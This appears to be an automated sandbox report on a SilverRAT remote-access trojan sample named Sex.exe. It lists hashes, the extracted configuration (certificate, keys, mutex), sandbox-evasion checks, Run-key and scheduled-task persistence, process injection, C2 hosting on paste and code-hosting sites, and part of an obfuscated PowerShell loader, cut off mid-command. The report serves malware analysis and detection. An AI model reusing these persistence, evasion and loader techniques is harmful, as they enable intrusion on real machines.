Analysis
-
max time kernel
90s -
max time network
90s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-11-2024 04:24
Static task
static1
Behavioral task
behavioral1
Sample
Sex.exe
Resource
win10v2004-20241007-en
General
-
Target
Sex.exe
-
Size
8KB
-
MD5
e618f84aafa47620606982c4abbc7d67
-
SHA1
6f6e1f34130d3468da33ce0cadebddfce494255b
-
SHA256
ad616acb49d68d155b0ded0a269e9f823fda47f9a125e1a3eb8a71ffbd3d4747
-
SHA512
a5de82399c37e6441edbca72899588c5cbf5574968a81a2a4fe02aa5101a51a4c7b07219c92f10255005f2c8fe6abb66e1d493942e7757b6dfd0c318eb01b704
-
SSDEEP
96:zdXT3QNm17yCqN1BN3CyvI35R0k7+AmRuPKuHVlXxdbyIzNt:xrX7yCqDyyvYv+Am4PHVlXnyK
Malware Config
Extracted
silverrat
1.0.0.0
SilverMutex_GAZUkcCGjo
-
certificate
MIIE4DCCAsigAwIBAgIQAKQYOfZd86J2BfNjhG4CWTANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAZTaWx2ZXIwIBcNMjIwODI2MTkwMTA4WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBlNpbHZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAPbpOWfhZTuOfEaqqImTTe5dNHAAry7/mf00DCoI4lPZfypsc1tYraxSPFeayGu09a3qdhkWKSVIgwnu2n4GLQNOCY9fh/1oyrX4Iir3BIkYeU7pKTWgjhUlAmFAUAaNr0ca23Ku2kN79jrDzRznOgE2DEW4p7OiM4Mb097ma9lzu7MyssHbY4VCteAhj9HZiplqBxaC1vXDmzxqG+gUZ1aLcyG7ssdkOjtWVBgT3gD/gOl7KchRzCFB1egDC/vD9WZCG35U3Ngi+IkTznoXR1R06cq4v0UnGjE37R2vcB21qb0ZYNiZJXZHv5i9+R7xoPeNoLda5PqnfGGbhPvNEdD56mdcOKlzGIuyemLkUo8texdpiBWKbtc3JZf5VsKxjJtHDK3xW6gDGI+PAirzGkFPmwcf8WgsblvzLg8OZpVxVs8rmKWoi6qIrf4CXnyl73J4lgzW+ir7PjANAQXwLNGdNnvdMeLeo/muGQPdeNpr6OczGGnkWA4qniHeL51/Gx0a8A+jP9zKiyu+qHcsP2IotgWDH/KlzJVr7IAum+DV92uV8poTDcUNcHaKvhHA65KmEtsvLbK6lFZcAMC0eWC0VgpW44T1/16rOaaky5mP6rTMc3nSyOl/lU/XgAgGGQPe22bRLWYzd3WVeEpI1WnHYXS+tL9IOe4kJP+pYsWDAgMBAAGjMjAwMB0GA1UdDgQWBBR32TJj2LeUx9L+RcSOvmFV6VJq6TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQA+qucSOi7ov7Q1FmAjMf925KuvKuCNwJiu3Sqo3FDGVAD1fAwAi2FdyuXEO2VIUPZCkalFcBna5rqyrc6tcS4T0IL2TsYLrsuGir7PWP7CAcft1urYS1HpNpHxeH/nixwnQaQs/MuRmdm2TeCj6G21P5BTW55U5y9sMPSYwhbD2N7XLgnSQd5Y+80TR7FUiye/k3D37fI9PRhSQGbfYFRQQTmxj84dPTnY5CVgaY9d8fNiFZkyjaZdf+mibK0xQTf+xLVVj+toDNCkc1F462TdmFhCrHd4PoMo0yLDNv4SC6NLRq4haWDRtORw6gd5GYIoCQ3m3oQvNlNxXhhIjsOyxkxOrkCD0c+57PIc7EmKXieJa/XxnkcIVxO8dvTY/vijuz/VaZYl/lPu9ckuqgJ1wRvvsHl70Trv4Mn4X5uCIqRFFlK/mSOZbLIguGkDN3QIZABvej89vlZMhrVfZOG2oawe23FskHjv7thF/WzOXtWw6RUVC1V+hCwbuxFNUjZmmOTUwdXHnus7I2AuiG6Jz1+y9aYiXBcVTdSljxjHRRmiRaAnY94h58vN8NJ4hKL2GVCo6LxkpuplmcntJN0cKraKTPxSXcCRrqWxX9qoIbfvBcUU4vH1jPJCCLNCuDyD3lgQkpPVvq0EMU1a2HFGgMEQMjpYpb38rcadDhT5ag==
-
decrypted_key
-|S.S.S|-
-
key
yy6zDjAUmbB09pKvo5Hhug==
-
key_x509
c0pTT0F4YUlWdnprRUZXU0lZck5EUEdMcFJ1UnpG
-
reconnect_delay
4
-
server_signature
N+iIgSoPCcWhCD0PCuU1EnqdssSySClpb5jHn0rlzcGXjOiC8ogxjV2ydCOO+ArBSp8RSv40oajf12v1vhqfmk2ilGPMWjEbqLvPDU2LMgihDzwv3ZfuA6mP2Aa/Unj1blMMQJIfhkDRZ8Y/8D4k3yCrzjkQpVL/lzoytAKaxhscaFQWcUzMysFWdzTOXj3EGXxOUftnKNoeefKDUkkgsOkR8CtSM/hj7iXHgsq5nnhloGeE1zAP9Sfk3YWSl/FkqV9JxjUEiN3eZX9csVjzZ53RP9RqcnALfPHrx/g9CYTRlm4W+e3cO3hGznYJCYZMSkqmPmRpJrecIcL9gkIvfUtbr5vyN9G26VEJDcKUe0URP7GL6HSw+qZ3Mgtb64YVV9GPP/kFtBxewsjmF6szDIlCmHGihNo5kT50Aqxzsv3Vhks9p5hZpt2fvOlKHwYlu+kg9RYn/90wIP28qUbfInnbw4zOcEuhgu9YnApx380zyAJg7tD2dts5W/vcyRBrnIXtJlGVeFEh8pQQI7Mr9esuQkX6GmMcWGX+lB244AgTEf3lKcC0ADB3UiLdGy7HwB4X2cUqvuyXJQicFfuf+wMMh3Q9Ocg+AG696zSjFSZdGbA722nbixPfZWlp0l1z0GF7ntSbelpa67RgjQQc6PlepRIlylqCjTg/EASPPvE=
Signatures
-
Silverrat family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3520 created 612 3520 powershell.EXE 5 -
pid Process 3520 powershell.EXE 2688 powershell.exe 3960 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation Sex.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation svClient.exe -
Executes dropped EXE 3 IoCs
pid Process 1164 svClient.exe 3132 sv.exe 2380 svClient.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\svClient\\svClient.exe\"" svClient.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 18 raw.githubusercontent.com 30 pastebin.com 3 pastebin.com 4 pastebin.com 7 pastebin.com 17 raw.githubusercontent.com -
Drops file in System32 directory 11 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\svClient.exe svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\svClient_Task-HOURLY-01 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3520 set thread context of 4584 3520 powershell.EXE 102 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Sex.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2476 timeout.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 42 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3004 schtasks.exe 1220 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1164 svClient.exe 2688 powershell.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 1164 svClient.exe 2688 powershell.exe 3960 powershell.exe 3960 powershell.exe 3520 powershell.EXE 3520 powershell.EXE 3520 powershell.EXE 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe 4584 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3188 Sex.exe Token: SeDebugPrivilege 1164 svClient.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeDebugPrivilege 3960 powershell.exe Token: SeDebugPrivilege 3520 powershell.EXE Token: SeDebugPrivilege 3520 powershell.EXE Token: SeDebugPrivilege 4584 dllhost.exe Token: SeDebugPrivilege 2380 svClient.exe Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 2128 svchost.exe Token: SeIncreaseQuotaPrivilege 2128 svchost.exe Token: SeSecurityPrivilege 2128 svchost.exe Token: SeTakeOwnershipPrivilege 2128 svchost.exe Token: SeLoadDriverPrivilege 2128 svchost.exe Token: SeSystemtimePrivilege 2128 svchost.exe Token: SeBackupPrivilege 2128 svchost.exe Token: SeRestorePrivilege 2128 svchost.exe Token: SeShutdownPrivilege 2128 svchost.exe Token: SeSystemEnvironmentPrivilege 2128 svchost.exe Token: SeUndockPrivilege 2128 svchost.exe Token: SeManageVolumePrivilege 2128 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2128 svchost.exe Token: SeIncreaseQuotaPrivilege 2128 svchost.exe Token: SeSecurityPrivilege 2128 svchost.exe Token: SeTakeOwnershipPrivilege 2128 svchost.exe Token: SeLoadDriverPrivilege 2128 svchost.exe Token: SeSystemtimePrivilege 2128 svchost.exe Token: SeBackupPrivilege 2128 svchost.exe Token: SeRestorePrivilege 2128 svchost.exe Token: SeShutdownPrivilege 2128 svchost.exe Token: SeSystemEnvironmentPrivilege 2128 svchost.exe Token: SeUndockPrivilege 2128 svchost.exe Token: SeManageVolumePrivilege 2128 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2128 svchost.exe Token: SeIncreaseQuotaPrivilege 2128 svchost.exe Token: SeSecurityPrivilege 2128 svchost.exe Token: SeTakeOwnershipPrivilege 2128 svchost.exe Token: SeLoadDriverPrivilege 2128 svchost.exe Token: SeSystemtimePrivilege 2128 svchost.exe Token: SeBackupPrivilege 2128 svchost.exe Token: SeRestorePrivilege 2128 svchost.exe Token: SeShutdownPrivilege 2128 svchost.exe Token: SeSystemEnvironmentPrivilege 2128 svchost.exe Token: SeUndockPrivilege 2128 svchost.exe Token: SeManageVolumePrivilege 2128 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2128 svchost.exe Token: SeIncreaseQuotaPrivilege 2128 svchost.exe Token: SeSecurityPrivilege 2128 svchost.exe Token: SeTakeOwnershipPrivilege 2128 svchost.exe Token: SeLoadDriverPrivilege 2128 svchost.exe Token: SeSystemtimePrivilege 2128 svchost.exe Token: SeBackupPrivilege 2128 svchost.exe Token: SeRestorePrivilege 2128 svchost.exe Token: SeShutdownPrivilege 2128 svchost.exe Token: SeSystemEnvironmentPrivilege 2128 svchost.exe Token: SeUndockPrivilege 2128 svchost.exe Token: SeManageVolumePrivilege 2128 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2128 svchost.exe Token: SeIncreaseQuotaPrivilege 2128 svchost.exe Token: SeSecurityPrivilege 2128 svchost.exe Token: SeTakeOwnershipPrivilege 2128 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2380 svClient.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3188 wrote to memory of 1164 3188 Sex.exe 87 PID 3188 wrote to memory of 1164 3188 Sex.exe 87 PID 3188 wrote to memory of 2688 3188 Sex.exe 88 PID 3188 wrote to memory of 2688 3188 Sex.exe 88 PID 3188 wrote to memory of 2688 3188 Sex.exe 88 PID 3188 wrote to memory of 3132 3188 Sex.exe 97 PID 3188 wrote to memory of 3132 3188 Sex.exe 97 PID 3188 wrote to memory of 3132 3188 Sex.exe 97 PID 3188 wrote to memory of 3960 3188 Sex.exe 98 PID 3188 wrote to memory of 3960 3188 Sex.exe 98 PID 3188 wrote to memory of 3960 3188 Sex.exe 98 PID 3520 wrote to memory of 4584 3520 powershell.EXE 102 PID 3520 wrote to memory of 4584 3520 powershell.EXE 102 PID 3520 wrote to memory of 4584 3520 powershell.EXE 102 PID 3520 wrote to memory of 4584 3520 powershell.EXE 102 PID 3520 wrote to memory of 4584 3520 powershell.EXE 102 PID 3520 wrote to memory of 4584 3520 powershell.EXE 102 PID 3520 wrote to memory of 4584 3520 powershell.EXE 102 PID 3520 wrote to memory of 4584 3520 powershell.EXE 102 PID 4584 wrote to memory of 612 4584 dllhost.exe 5 PID 4584 wrote to memory of 668 4584 dllhost.exe 7 PID 4584 wrote to memory of 956 4584 dllhost.exe 12 PID 4584 wrote to memory of 316 4584 dllhost.exe 13 PID 4584 wrote to memory of 508 4584 dllhost.exe 14 PID 4584 wrote to memory of 952 4584 dllhost.exe 16 PID 4584 wrote to memory of 1064 4584 dllhost.exe 17 PID 4584 wrote to memory of 1084 4584 dllhost.exe 18 PID 4584 wrote to memory of 1176 4584 dllhost.exe 19 PID 4584 wrote to memory of 1208 4584 dllhost.exe 20 PID 4584 wrote to memory of 1244 4584 dllhost.exe 21 PID 4584 wrote to memory of 1316 4584 dllhost.exe 22 PID 4584 wrote to memory of 1380 4584 dllhost.exe 23 PID 4584 wrote to memory of 1388 4584 dllhost.exe 24 PID 4584 wrote to memory of 1400 4584 dllhost.exe 25 PID 4584 wrote to memory of 1420 4584 dllhost.exe 26 PID 4584 wrote to memory of 1580 4584 dllhost.exe 27 PID 4584 wrote to memory of 1604 4584 dllhost.exe 28 PID 4584 wrote to memory of 1676 4584 dllhost.exe 29 PID 4584 wrote to memory of 1724 4584 dllhost.exe 30 PID 4584 wrote to memory of 1800 4584 dllhost.exe 31 PID 4584 wrote to memory of 1808 4584 dllhost.exe 32 PID 4584 wrote to memory of 1936 4584 dllhost.exe 33 PID 4584 wrote to memory of 2000 4584 dllhost.exe 34 PID 4584 wrote to memory of 2012 4584 dllhost.exe 35 PID 4584 wrote to memory of 1756 4584 dllhost.exe 36 PID 4584 wrote to memory of 2112 4584 dllhost.exe 37 PID 4584 wrote to memory of 2128 4584 dllhost.exe 38 PID 4584 wrote to memory of 2224 4584 dllhost.exe 40 PID 4584 wrote to memory of 2308 4584 dllhost.exe 41 PID 4584 wrote to memory of 2440 4584 dllhost.exe 42 PID 4584 wrote to memory of 2448 4584 dllhost.exe 43 PID 4584 wrote to memory of 2652 4584 dllhost.exe 44 PID 4584 wrote to memory of 2664 4584 dllhost.exe 45 PID 4584 wrote to memory of 2696 4584 dllhost.exe 46 PID 4584 wrote to memory of 2732 4584 dllhost.exe 47 PID 4584 wrote to memory of 2788 4584 dllhost.exe 48 PID 4584 wrote to memory of 2796 4584 dllhost.exe 49 PID 4584 wrote to memory of 2804 4584 dllhost.exe 50 PID 4584 wrote to memory of 2912 4584 dllhost.exe 51 PID 4584 wrote to memory of 2984 4584 dllhost.exe 52 PID 4584 wrote to memory of 752 4584 dllhost.exe 53 PID 4584 wrote to memory of 3292 4584 dllhost.exe 55 PID 4584 wrote to memory of 3424 4584 dllhost.exe 56 PID 4584 wrote to memory of 3548 4584 dllhost.exe 57 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:316
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{bac40e51-09ee-4729-9154-41c22f77609c}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4584
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:508
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:952
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1176 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:yZJanTwbuUYg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wDUFYRrQaOxVrt,[Parameter(Position=1)][Type]$YFnakGISxb)$ffcxsYmXiHF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 